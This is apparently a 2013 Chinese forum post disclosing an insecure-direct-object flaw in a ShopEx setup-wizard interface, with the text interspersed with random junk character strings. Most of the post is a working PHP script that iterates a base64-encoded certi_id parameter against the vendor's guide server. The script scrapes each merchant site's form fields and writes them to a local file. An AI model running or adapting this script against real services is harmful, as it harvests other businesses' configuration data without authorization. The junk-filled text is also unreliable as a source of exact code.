|
|
简要描述:6 e( }. c& x, R8 V+ Q% u1 A
ShopEx某接口缺陷,可遍历所有网站
8 X5 |0 K, A7 S6 Y5 T/ {详细说明:
! X& F H4 `0 j问题出现在shopex 网店使用向导页面 # k6 t' p3 Y+ q7 i
( r9 V) P( A4 J2 j2 }' M
4 A( K9 K! i) e; P/ G; W8 B5 R% R9 U. i9 U# J+ @: h j9 [+ d5 O5 C
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=$ i: k4 J" |% x1 @+ x& v
6 K, {- S* @% I& z3 |
/ a# ?4 l: m" q7 n: a9 `& v5 l7 ~0 @/ V
j0 `, A$ ^2 n9 O O% i5 E0 `/ @5 @refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}* `" Y0 L7 L7 Z- M8 _ F ?1 n. d
% j: P2 P8 V) q# f
4 U# u: S( i. a! f# a& j9 ]7 u
) x6 k- V; t8 D我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 9 \- n5 E/ w: v+ S* q$ Z0 y( b
# b4 L$ z0 Z' Y7 v W3 p( B6 ~/ s+ q, j5 R5 P
8 o, M. l9 z9 Z4 {1 l5 o! a; C' K
<?php1 g& i' r5 U, Z- I" p" U. F
% q1 _1 V+ \( A; C
for ($i=1; $i < 10000; $i++) { //遍历+ X5 h) n3 T# T& I
: ?9 j P4 u' ^0 e' t: `. a+ {! I
ShowshopExD($i);# G+ C. V! ~3 l
8 F; c. P. }7 K% b p: q' v }- D2 u) _6 e# D
" g3 y) i8 l8 O9 U( l+ E/ C function ShowshopExD($cid) {% k' ~6 u% P9 q# O# R9 W' ]9 [
% T9 d: r5 H; |! L! E $url='http://guide.ecos.shopex.cn/step2.php';
* |0 Z, ?, h$ f
) ~' u9 ]2 _: X7 E $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');% C0 P* C# }$ |1 Y
2 j( n# U' }( M- j
$url = $url.'?refer='.$refer;9 H: l* p) D e" a- }: r8 c2 ]% H4 o
D4 l P& ~- v Z $ch = curl_init($url);
( q+ @0 G& F7 c$ H! W
3 }" X+ e7 \6 G1 z+ L# h curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
* m$ Q# I" n. }. p1 \
$ l3 L6 l* }0 t4 @. B curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
/ o' \0 `9 [( [* `
' X. i" F% v6 E: Z. R $result = curl_exec($ch);9 y! K, p* {5 y% C# Q/ O" e2 c/ g3 v
D4 T! n$ V& _ $result = mb_convert_encoding($result, "gb2312", "UTF-8");
1 Z+ q" g9 Q' ?7 I
/ M' g1 W0 E% o# u if(strpos($result,$refer))" y# _4 \ j0 I1 l: s+ j
: H5 t# k/ X4 t; c8 T {
0 l+ x& \+ L3 L5 K' T L& f8 K0 |, c# d/ e# n
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件
8 v9 K- P2 t- s3 g, t/ B: g* b, q, Y2 u
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
7 o( [; s7 Y4 [* }6 O* u& _0 a$ ^" j# D1 k
foreach ($value[1] as $key) {
, ?! L8 |- C% {2 Q& o+ a9 O( y" I g5 v! {9 ^
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);# r( i, I5 {2 C/ i3 y4 \
2 N ]4 e+ r) J L
echo $res[1][0].':'.$res[3][0]."\r\n";
9 w; ]- d" R& j( Z4 s
, d! a$ }& ?9 H D $col =$res[1][0].':'.$res[3][0]."\r\n";
, Z! H0 M$ ~" h+ K( B" x$ |0 ]5 y3 U: W" ~. A; f! j; ?! M
fwrite($fp, $col, strlen($col)); % H( T& I: y, U
* G- j$ @% ^5 e+ G2 r" ~9 G0 X
}
7 k0 H' t1 R" X- j6 P( T
+ P' g2 }7 [4 ?. o* [6 v echo '--------------------------------'."\r\n";
3 q( K2 I6 |1 S# U3 S) }$ O! D2 R$ K X. e* t P/ J% }8 ?
fclose($fp);
7 z8 s* X W& s3 d$ L: o) z4 _2 [) a
}
' I5 a! Y, }: z5 L( h/ a
# g* P8 i2 i7 {2 a5 R8 ` flush();
: E) w' ]6 J1 p4 A ~0 u+ Z B
" _) L7 {+ w* o& N/ l/ p# b curl_close($ch);. U3 y' K$ `8 _$ ?+ u
' G* O' j# S) x7 e+ N }
3 {0 g; q" b; ]% J- s/ X. h% w5 q, I/ z9 Q6 d( J% h
?>
+ u! {* c* n: J* L4 y C( _+ \漏洞证明: `3 v! D* S& x. E* f; n
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
" ` g6 R% q: e% Xrefer换成其他加密方式
) r5 C! Q- R0 Y7 ?9 } |
|
发表于 2013-9-21 15:59:47
收藏
支持
反对